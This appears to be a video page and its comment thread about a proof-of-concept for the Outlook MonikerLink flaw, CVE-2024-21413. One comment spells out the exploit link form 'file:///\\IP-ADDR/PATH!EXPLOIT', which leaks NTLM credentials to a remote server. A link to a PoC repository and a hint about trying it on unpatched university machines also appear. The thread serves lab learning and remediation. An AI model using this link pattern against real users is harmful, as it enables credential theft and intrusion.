CVE-2024-21413 - Microsoft Outlook Remote Code Execution Vulnerability POC
ฝัง
- เผยแพร่เมื่อ 5 ต.ค. 2024
- An attacker could craft a malicious link that bypasses the Protected View Protocol, which leads to the leaking of local NTLM credential information and remote code execution (RCE).
#CVE-2024-21413 #infosec #rce #outlook #pentester
Amazingly simple poc...thx!
To reinstall and renew security after experiencing the CVE-2024-21413 Microsoft Outlook Remote Code Execution Vulnerability, organizations should follow the remediation steps outlined by the Triskele Labs team and the Microsoft Security Response Center (MSRC). This may include applying patches released by Microsoft, updating affected versions of Microsoft Outlook, and implementing additional security measures to prevent exploitation of the vulnerability. It is crucial to stay informed about security updates and best practices to mitigate the risks associated with this vulnerability.
Nice video but no sound.
good !!
hi, where did you get the snapshot with the vulnerable version of outlook
My uni’s computers didnt do the update yet, I wonder if.. (I’m too lazy to do it but it prolly works)
thanks for the vid
🙏🙏 thank
what is link in Github? thanks for video
github.com/CMNatic/CVE-2024-21413
i dont want to know how much outlook got spammed with this shit man
ارقد ونوووم احسن ماتسوي شروحات
Hi, I followed same steps but my NTLM creds looks different, it is not ADMINISTRATOR, it started with tryhackme username(Note: I am using RDP to connect to attackbox) and also If i do hashcat on the resulting hash everytime it is getting exhausted(Note: I am using 4gb memory too)
Ah I see because you're creating a link with a "file" (with this structure: file:///\\IP-ADDR/PATH!EXPLOIT ) in the path. But this path which actually calls a potential arbitrary URL or IP address you can exfiltrate the NTLM credentials because Outlook authenticates itself over the currently logged in user at the file system which is in our case the catcher server. Is that correct?
That's correct. More details here : research.checkpoint.com/2024/the-risks-of-the-monikerlink-bug-in-microsoft-outlook-and-the-big-picture/
@@zalepentester Thank you very much-the article you sent answers my further questions and is very interesting.
@@science0101 Don't worry . THANK !!!